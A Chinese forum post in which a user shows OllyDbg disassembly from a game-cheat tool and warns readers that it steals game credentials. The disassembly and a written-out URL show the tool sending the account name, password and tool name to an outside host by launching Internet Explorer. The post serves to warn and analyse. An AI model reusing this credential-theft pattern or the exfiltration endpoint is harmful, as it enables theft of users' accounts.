以下是OD里调试出来的结果! 看不懂的直接绕到下面!
____________________________________________________________________________

00403795 68 0C264000 push R2挂机使.0040260C ; UNICODE "C:\Program Files\Internet Explorer\iexplore.exe http://3364.pqpq.net/test(3") ( 注意这里的意思是"3个TEST")
0040379A 50 push eax
0040379B FFD3 call ebx
0040379D 8BD0 mov edx,eax
0040379F 8D4D DC lea ecx,dword ptr ss:[ebp-24]
004037A2 FFD7 call edi
004037A4 50 push eax
004037A5 68 C8264000 push R2挂机使.004026C8 ; UNICODE "&pass=" (注意:这里是你写下游戏密码 "&pass=")
004037AA FFD3 call ebx
004037AC 8BD0 mov edx,eax
004037AE 8D4D D8 lea ecx,dword ptr ss:[ebp-28]
004037B1 FFD7 call edi
004037B3 8B4D E4 mov ecx,dword ptr ss:[ebp-1C]
004037B6 50 push eax
004037B7 51 push ecx
004037B8 FFD3 call ebx
004037BA 8BD0 mov edx,eax
004037BC 8D4D D4 lea ecx,dword ptr ss:[ebp-2C]
004037BF FFD7 call edi
004037C1 50 push eax
004037C2 68 DC264000 push R2挂机使.004026DC ; UNICODE "&biner=" (注意这里是 恶意软件的名字)
004037C7 FFD3 call ebx
004037C9 8BD0 mov edx,eax
004037CB 8D4D D0 lea ecx,dword ptr ss:[ebp-30]
004037CE FFD7 call edi
004037D0 8B55 E0 mov edx,dword ptr ss:[ebp-20]
004037D3 50 push eax
004037D4 52 push edx
004037D5 FFD3 call ebx
004037D7 8945 C4 mov dword ptr ss:[ebp-3C],eax
004037DA 8D45 BC lea eax,dword ptr ss:[ebp-44]
004037DD BF 08000000 mov edi,8
004037E2 6A 00 push 0
004037E4 50 push eax
004037E5 897D BC mov dword ptr ss:[ebp-44],edi
004037E8 FF15 4C104000 call dword ptr ds:[<&MSVBVM60.#60>; MSVBVM60.rtcShell ___________________________________________________________________________

以上是我重某个帖子发布的恶意软件里面调试出来的东西,我调试到一半就不敢再搞了,等下去还源!

我再恶意软件找到的地址:http://3364.pqpq.net/test(3个TEXT).asp?name=123123123&pass=1231231231&biner=QQ音速挂机使用版

( http://3364.pqpq.net/test(3个TEXT).asp? 这里是个网站)
( name=123123123 这里是你输入的游戏帐号) (&pass=1231231231 这里是你输入的密码)
( &biner=QQ音速挂机使用版 这里是他外挂的名字)

我给大家上图我找出来了什么! (保证你们惊吓!)


图:
[upload=1]

描述:未命名.jpg

凡是不要只看杀毒软件,不要因为杀毒软件报毒你就信,软件是有误报的!

我想这样的软件是杀不出来的吧!

怎么上不到

dddddddddddddddddd

什么啊？看不懂呀？

什么东西。

7分外挂 3分毒 你们没听过？

什麼意思？沒看懂